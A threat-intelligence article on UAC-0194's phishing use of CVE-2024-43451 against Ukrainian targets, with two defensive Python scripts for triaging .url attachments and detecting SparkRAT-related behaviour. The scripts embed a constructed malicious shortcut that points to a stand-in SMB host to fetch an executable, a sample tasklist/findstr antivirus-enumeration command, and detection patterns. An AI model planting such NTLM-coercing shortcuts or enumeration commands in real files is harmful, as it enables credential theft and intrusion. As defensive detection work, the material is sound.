UAC-0194’s Exploitation of CVE-2024-43451 in Ukraine for Phishing
The UAC-0194 cyber threat group, suspected to have Russian affiliations, has been linked to a series of attacks exploiting the recently patched Windows vulnerability CVE-2024-43451, primarily targeting Ukrainian entities. The vulnerability, an NTLM hash disclosure flaw, was identified by security researchers at ClearSky and is triggered by user interaction with Internet shortcut (.url) files that point to an attacker-controlled server; the user does not have to open the file, because Windows Explorer resolves the shortcut's remote resource on its own. “When the user interacts with the URL file by right-clicking, deleting, or moving it, the vulnerability is triggered,” ClearSky explained, adding that a compromised Ukrainian government server distributed phishing emails containing malicious URL files. The emails urged recipients to interact with the file under the pretense of renewing academic certificates, eventually leading to the execution of unauthorized commands. ClearSky shared its findings with CERT-UA, the Ukrainian Computer Emergency Response Team, which attributed the distribution of these files to Ukrainian government and educational entities to UAC-0194. Microsoft released a fix for CVE-2024-43451 as part of the November 2024 Patch Tuesday update.
The attack chain, identified and reported in part by CERT-UA, begins with a phishing email sent from a compromised Ukrainian government server. The email links to a URL file that, when the user interacts with it, makes Windows open an SMB connection to an external server to retrieve executable (EXE) files. “The Ukrainian CERT revealed that the URL file is propagated as part of a campaign by threat actor UAC-0194, suspected as Russian, that targets entities in Ukraine,” ClearSky notes. That SMB connection carries the victim's NTLM authentication, which the attacker's server records. What is captured is the NTLM challenge-response (Net-NTLMv2 on default configurations) rather than the stored password hash, so it cannot be replayed directly in a pass-the-hash attack; it can, however, be cracked offline to recover the plaintext password or relayed to another service that accepts NTLM authentication, either of which grants further unauthorized access to targeted systems.
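As an added example (not ClearSky's or CERT-UA's code), the following Python triages Internet shortcut (.url) attachments of the kind described in the two paragraphs above: it parses the [InternetShortcut] section and flags any URL, IconFile or WorkingDirectory value that names a remote host through a UNC or file:// path, which is what makes Explorer open the outbound SMB connection when the file is displayed, right-clicked, moved or deleted. The two sample shortcuts and the 203.0.113.25 address are constructed for the example and are not indicators from the campaign.

```python
import re
from typing import Dict, List, Optional

# Keys in an Internet shortcut that Explorer resolves (and so may open an
# outbound SMB connection for) without the user opening the file.
REMOTE_CAPABLE_KEYS = ("url", "iconfile", "workingdirectory")

# \\host\share\...  (forward slashes are normalised to backslashes first)
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")


def parse_internet_shortcut(text: str) -> Dict[str, str]:
    """Minimal INI reader for the [InternetShortcut] section of a .url file."""
    fields: Dict[str, str] = {}
    in_section = False
    for raw in text.lstrip("\ufeff").splitlines():   # tolerate a UTF-8 BOM
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def remote_host(value: str) -> Optional[str]:
    """Return the host named by a UNC or file:// path, or None for local/other values."""
    v = value.strip().strip('"')
    if v.lower().startswith("file:"):
        v = v[len("file:"):]
    v = v.replace("/", "\\")
    m = UNC_RE.match(v)
    if not m:
        return None        # http(s)://..., C:\..., file:///C:/... all end up here
    return m.group(1)


def analyze_shortcut(text: str) -> List[Dict[str, str]]:
    """List every field that would make Explorer contact a remote host."""
    fields = parse_internet_shortcut(text)
    findings: List[Dict[str, str]] = []
    for key in REMOTE_CAPABLE_KEYS:
        if key in fields:
            host = remote_host(fields[key])
            if host:
                findings.append({"field": key, "host": host, "value": fields[key]})
    return findings


# Constructed samples (hypothetical host; not indicators from the campaign).
SAMPLE_MALICIOUS = r"""[InternetShortcut]
URL=file://203.0.113.25/share/certificate.exe
IconFile=\\203.0.113.25\share\cert.ico
IconIndex=1
"""

SAMPLE_BENIGN = r"""[InternetShortcut]
URL=https://example.org/renew
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
"""

if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        hits = analyze_shortcut(sample)
        hosts = sorted({h["host"] for h in hits})
        print(f"{name}: {'quarantine, hunt for ' + str(hosts) if hits else 'no remote fetch'}")
        for h in hits:
            print(f"  {h['field']}={h['value']}")
```

Any hit is worth quarantining the attachment and searching proxy and firewall logs for outbound TCP/445 to the named host; a benign shortcut carries an http(s) URL and a local icon path, so it produces no findings.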
In the attack CERT-UA documented, the URL file leads to the execution of an executable masquerading as a certificate, which tells the user that the certificate was "activated, and the information has been sent to the governmental certification system." Meanwhile a .cmd file is dropped that enumerates running processes with 'tasklist' and pipes the output through 'findstr' to look for security software such as Avast, Norton, and Sophos, letting the attackers check for antivirus or endpoint monitoring before proceeding. The final stages deploy the SparkRAT malware via AutoIt, establishing persistence under the name "Wave360 Sync Technologies Co\SyncWave360.js" and placing the same script in the Startup folder. SparkRAT, an open-source remote access tool, communicates with a command-and-control server on port 8000, giving the attackers ongoing access to the compromised systems.
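As an added example (again not code from CERT-UA or the campaign), this Python runs three detection rules over constructed Sysmon-style process, file and network events matching the behaviours just described: a command line that pipes tasklist into findstr and names a security product, a .js file written to a Startup folder, and an outbound connection to TCP/8000 from a binary outside Windows or Program Files. The field names, host names, user, paths and IP addresses are assumptions for the sample, not real telemetry or indicators; the network rule is deliberately weak on its own and is only escalated when a host-based rule corroborates it.

```python
import re
from typing import Dict, List, Optional

# Field names follow Sysmon Event ID 1 (process create), 11 (file create) and
# 3 (network connect) but are assumptions: map them to your own schema.
AV_NAMES = ("avast", "norton", "sophos")   # products the dropper looked for
SPARKRAT_C2_PORT = 8000                     # C2 port named in the report

STARTUP_JS_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.js$", re.IGNORECASE)
TRUSTED_DIR_RE = re.compile(r"^c:\\(windows|program files( \(x86\))?)\\", re.IGNORECASE)


def rule_av_enumeration(ev: Dict) -> Optional[str]:
    """Process creation whose command line pipes tasklist into findstr and names an AV product."""
    if ev.get("event_id") != 1:
        return None
    cl = ev.get("command_line", "").lower()
    if "tasklist" in cl and "findstr" in cl and any(n in cl for n in AV_NAMES):
        return "av_enumeration_tasklist_findstr"
    return None


def rule_startup_js(ev: Dict) -> Optional[str]:
    """A .js file created inside a Startup folder, the persistence location described."""
    if ev.get("event_id") == 11 and STARTUP_JS_RE.search(ev.get("target_filename", "")):
        return "js_written_to_startup_folder"
    return None


def rule_untrusted_process_port_8000(ev: Dict) -> Optional[str]:
    """Outbound TCP/8000 from a binary outside Windows or Program Files (weak on its own)."""
    if (ev.get("event_id") == 3 and ev.get("dest_port") == SPARKRAT_C2_PORT
            and not TRUSTED_DIR_RE.match(ev.get("image", ""))):
        return "untrusted_process_to_tcp_8000"
    return None


RULES = (rule_av_enumeration, rule_startup_js, rule_untrusted_process_port_8000)


def run_detections(events: List[Dict]) -> Dict[str, List[str]]:
    """Map each host to the distinct rule names that fired, in order of first hit."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                names = hits.setdefault(ev.get("host", "?"), [])
                if name not in names:
                    names.append(name)
    return hits


def is_likely_compromised(rule_names: List[str]) -> bool:
    """Escalate only when two different stages corroborate each other."""
    return len(set(rule_names)) >= 2


# Constructed telemetry: host names, user, paths and IPs are invented for the sample.
SAMPLE_EVENTS = [
    {"host": "WS-101", "event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c tasklist | findstr /i "avast norton sophos"'},
    {"host": "WS-101", "event_id": 11, "image": r"C:\Users\olena\AppData\Local\Temp\cert.exe",
     "target_filename": r"C:\Users\olena\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SyncWave360.js"},
    {"host": "WS-101", "event_id": 3, "image": r"C:\Users\olena\AppData\Roaming\Wave360 Sync Technologies Co\updater.exe",
     "dest_ip": "198.51.100.7", "dest_port": 8000},
    {"host": "WS-202", "event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c tasklist /svc"},
    {"host": "WS-202", "event_id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "203.0.113.9", "dest_port": 8000},
]

if __name__ == "__main__":
    for host, names in run_detections(SAMPLE_EVENTS).items():
        flag = "LIKELY COMPROMISED" if is_likely_compromised(names) else "investigate"
        print(f"{host}: {flag}: {', '.join(names)}")
```

On the sample, WS-101 trips all three rules and is escalated, while WS-202 (a plain tasklist and a browser talking to port 8000) produces nothing; in production the command-line rule would be widened to cover other product names and the port rule tied to the actual C2 addresses from the CERT-UA advisory.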
This targeted exploitation of CVE-2024-43451 underlines the need for organizations to apply Microsoft's November 2024 patch promptly and reinforces CERT-UA's advisory on the threat UAC-0194 poses to Ukrainian infrastructure. The patch removes this particular trigger, but the underlying technique, coercing a workstation into NTLM authentication against an attacker's SMB server, recurs across file formats, so blocking outbound SMB (TCP 445) to the internet and requiring SMB signing remain worthwhile regardless.